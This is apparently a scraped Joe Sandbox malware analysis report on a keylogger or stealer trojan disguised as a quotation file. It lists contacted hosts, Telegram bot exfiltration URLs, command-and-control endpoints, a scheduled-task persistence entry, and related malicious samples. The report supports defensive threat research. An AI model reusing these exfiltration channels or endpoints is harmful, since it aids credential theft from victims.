                  		truefalse
                    		high
                    reallyfreegeoip.org
                    		104.21.112.1
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          18.31.95.13.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high
                                    http://checkip.dyndns.org/false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/vbc.exe, 0000000C.00000002.4058029996.00000000070F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabvbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgvbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icovbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://us2.smtp.mailhostbox.comvbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.office.com/Pvbc.exe, 00000007.00000002.4059070573.0000000007554000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/DataSet1.xsdQUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.drfalse
                                                      		high
                                                      https://www.office.com/lBvbc.exe, 00000007.00000002.4059070573.000000000755E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.orgvbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20avbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=envbc.exe, 0000000C.00000002.4058029996.00000000070D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://varders.kozow.com:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://aborters.duckdns.org:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://51.38.247.67:8081/_send_.php?Lvbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://anotherarmy.dns.army:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://checkip.dyndns.org/qQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://chrome.google.com/webstore?hl=enlBvbc.exe, 00000007.00000002.4059070573.000000000752D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073E9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F89000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.orgvbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://chrome.google.com/webstore?hl=enPvbc.exe, 00000007.00000002.4059070573.0000000007523000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1660117333.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://reallyfreegeoip.org/xml/QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    132.226.8.169
                                                                                                    		checkip.dyndns.comUnited States
                                                                                                    		16989UTMEMUSfalse
                                                                                                    208.91.198.143
                                                                                                    		unknownUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                    149.154.167.220
                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                    		62041TELEGRAMRUfalse
                                                                                                    104.21.112.1
                                                                                                    		reallyfreegeoip.orgUnited States
                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                    208.91.199.223
                                                                                                    		us2.smtp.mailhostbox.comUnited States
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1589989
                                                                                                    Start date and time:2025-01-13 13:04:15 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 10m 2s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:17
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@16/11@6/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 254
                                                                                                    • Number of non-executed functions: 12
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 2.18.97.153, 20.109.210.53, 13.95.31.18, 52.149.20.212, 13.107.246.45
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • VT rate limit hit for: QUOTATION REQUIRED_Enatel s.r.l..bat.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    07:05:31API Interceptor1x Sleep call for process: QUOTATION REQUIRED_Enatel s.r.l..bat.exe modified
                                                                                                    07:05:33API Interceptor11x Sleep call for process: powershell.exe modified
                                                                                                    07:05:35API Interceptor1x Sleep call for process: vTAuFgZcVE.exe modified
                                                                                                    07:05:40API Interceptor12972085x Sleep call for process: vbc.exe modified
                                                                                                    13:05:34Task SchedulerRun new task: vTAuFgZcVE path: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    132.226.8.169PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    208.91.198.143Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        149.154.167.220Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                    Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                      nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          Exodus.txt.lnkGet hashmaliciousStormKittyBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            us2.smtp.mailhostbox.comPO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 208.91.199.224
                                                                                                                                            Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.198.143
                                                                                                                                            REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            reallyfreegeoip.orgRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.80.1
                                                                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.80.1
                                                                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.64.1
                                                                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.32.1
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.16.1
                                                                                                                                            aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.64.1
                                                                                                                                            api.telegram.orgRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            checkip.dyndns.comRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 193.122.130.0
                                                                                                                                            SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 158.101.44.242
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 158.101.44.242
                                                                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 158.101.44.242
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 193.122.6.168
                                                                                                                                            aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 158.101.44.242

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            TELEGRAMRURemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.170.96
                                                                                                                                            https://telegramerong.cc/app/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PUBLIC-DOMAIN-REGISTRYUSXre0Nmqk09.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                            • 162.251.80.30
                                                                                                                                            8BzIVoQT3w.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                            • 199.79.62.115
                                                                                                                                            EpH9QFlrm2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                            • 199.79.62.115
                                                                                                                                            PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.223
                                                                                                                                            PO23100076.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                            • 199.79.62.115
                                                                                                                                            ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.198.176
                                                                                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.199.225
                                                                                                                                            yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.198.176
                                                                                                                                            ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 208.91.198.176
                                                                                                                                            UTMEMUSPDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
